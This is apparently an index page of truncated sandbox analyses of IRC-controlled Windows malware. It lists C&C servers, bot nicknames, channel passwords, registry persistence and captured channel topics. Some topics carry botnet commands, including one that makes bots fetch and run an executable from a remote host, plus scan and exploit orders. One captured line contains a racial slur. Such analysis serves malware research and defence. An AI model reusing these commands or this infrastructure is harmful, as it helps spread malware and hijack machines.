Author: Pig

5.c) windows7addon.exe – Network Activity – DNS Queries: Name Query Type Query Result Successful Protocol login.ipwhois.org.uk DNS_TYPE_A 111.68.19.104 1 login.ipwhois.co.uk DNS_TYPE_A 111.68.19.104 1 www.pr0.net DNS_TYPE_A 64.59.116.150 1 – IRC Conversations: 111.68.19.104:47221 Nick: [00_AUT_XP_1270214]Username: SP3-601Joined Channel: #russiChannel Topic for Channel #russi: “.asc -S -s|.http http://privcash.cc/10.exe|.asc exp_all 15 5 0 -a -r -e -s|.asc exp_all 20 5Read more...

DNS LookupHost Name IP Addresssrv1.manage-your-box.ru 216.246.77.66rapidshare.com rapidshare.com 195.122.131.4rs716tg.rapidshare.com rs716tg.rapidshare.com 80.231.31.117Download URLshttp://195.122.131.4/files/298437914/81 (rapidshare.com)http://80.231.31.117/files/298437914/81 (rs716tg.rapidshare.com) * C&C Server: 216.246.77.66:1863 * Server Password: * Username: SPX * Nickname: N|DEU|0|XP|092652263 * Channel: #mix# (Password: ####) * Channeltopic: :8FEB48668E75185DB32D7D0B65D097F592B1C267FE416DF5E91C4DF84E6F6944306D807B4E8C1F5699261CC7FBCCD9D24E6CFF98134A2134D08B47A87849D7FC0C7B Outgoing connection to remote server: rapidshare.com TCP port 80Outgoing connection to remote server: rs716tg.rapidshare.com TCP port 80DNS LookupHost Name IP Addressdell-d3e62f7e26Read more...

Remote Host Port Number79.125.12.23 6667 NICK |POP|942165|1|en-US|USER |POP|942165|1|en-US| |POP|942165|1|en-US| |POP|942165|1|en-US| |POP|942165|1|en-US|JOIN #archer niggerPING :archer.no-ip.org Invisible Users: 489Operators: 13 operator(s) onlineChannels: 38 channels formedClients: I have 509 clients and 1 serversLocal users: Current Local Users: 509 Max: 673Global users: Current Global Users: 520 Max: 682 File System Modifications * The following files were created in theRead more...

Invisible Users: 52Operators: 1 operator(s) onlineChannels: 4 channels formedClients: I have 53 clients and 0 serversLocal users: Current Local Users: 53 Max: 104Global users: Current Global Users: 53 Max: 88 189.74.8.98 :6667 chanels #win,#system

# Winsock Section… * Unknown Connections o Host By Name: + Requested Host: ns2.mm1-shop.net + Resulting Address: 46.3.96.231 o Connection Established: 0 o Socket: 0 * UDP connections_listening o Transport Protocol: TCP o Local Port: 47154 o Connection Established: 0 o Socket: 1296 * Outgoing Connections o Transport Protocol: TCP o Remote Address: 87.118.112.244 oRead more...

Remote Host Port Number88.255.120.47 6667 NICK aynur|CamUSER Bahar11 “Cod” “timu.gadarlar.net” :aLeynaNICK kontroLUSER aynur1 “Cod” “timu.gadarlar.net” :melekUSERHOST aynur|CamMODE #Security#JOIN #!! birtanemMODE aynur|Cam +iMODE #!PRIVMSG #!! :ben geldimNICK Aysun883 * The following ports were open in the system: Port Protocol Process113 TCP caves.exe (%System%caves.exe)1052 TCP caves.exe (%System%caves.exe)1053 TCP caves.exe (%System%caves.exe)1054 TCP caves.exe (%System%caves.exe) Registry Modifications * TheRead more...

Remote Host Port Number67.43.232.35 10324 USER tntmej tntmej tntmej :kcmgivvvhwvccgbkNICK IeqiUsJyMODE IeqiUsJy +xiJOIN #kok6USERHOST IeqiUsJyMODE ##xddc +smntuMODE #xddc1 +smntuMODE #xddc2 +smntuMODE #kok6 +smntu * The following ports were open in the system: Port Protocol Process1052 TCP winamp.exe (%System%winamp.exe)17022 TCP winamp.exe (%System%winamp.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Winamp AgentRead more...

Remote Host Port Numberquasar.mooo.com 7000 NICK vinithapUSER arthur “” “quasar.mooo.com” :gunUSERHOST nickPART channelSILENCE +*!*@*,~*!*@*undernet.orgMODE vinithap +iwxMODE nick +iwxNICK jadanUSER mckayla “” “quasar.mooo.com” :zerosMODE jadan +iwxUSER arthur “” “lidingo.se.eu.undernet.org” :gunUSERHOST vinithapNICK :thiameMODE vinithap +iISON andrei Denisa devil Jumper liliana Linux maria mordor Petri play pOrn ReBe Robert Roberto sex sexy shaty unixUSER mod “” “lidingo.se.eu.undernet.org” :suzannaNICKRead more...

Remote Host Port Number67.215.1.206 8067.43.232.37 1863 USER ozzxfi ozzxfi ozzxfi :hcaacmswgsgesefnNICK NnKtdhMyVMODE NnKtdhMyV +xiJOIN #rstn3USERHOST NnKtdhMyVMODE ##xddc +smntuMODE #xddc1 +smntuMODE #xddc2 +smntuMODE #rstn3 +smntu * The following ports were open in the system: Port Protocol Process1054 TCP iexplore.exe (%System%iexplore.exe)1129 TCP iexplore.exe (%System%iexplore.exe)1130 TCP iexplore.exe (%System%iexplore.exe)22818 TCP iexplore.exe (%System%iexplore.exe) Registry Modifications * The following Registry KeyRead more...

64.85.167.174:6667 Nick: AUT|XP|SP3|00|3393Username: lfrmykServer Pass: 151515Joined Channel: #cumhur with Password 151515Private Message to User AUT|XP|SP3|00|3393: “VERSION” Now talking in #dezpotTopic On: [ #dezpot ] [ !vncstop !scan 94 1 !scan 94 1 190.x.x.x 3 1 210.x.x.x !msn ]Topic By: [ dezpot ]Modes On: [ #dezpot ] [ +mntf [5c#C15,5j#R5,12k#K10,12m#m10,5n#N15,8t#b]:10 ]ChanMode: KankilerimUser sets mode [-m]KankilerimUser) .msn.msgRead more...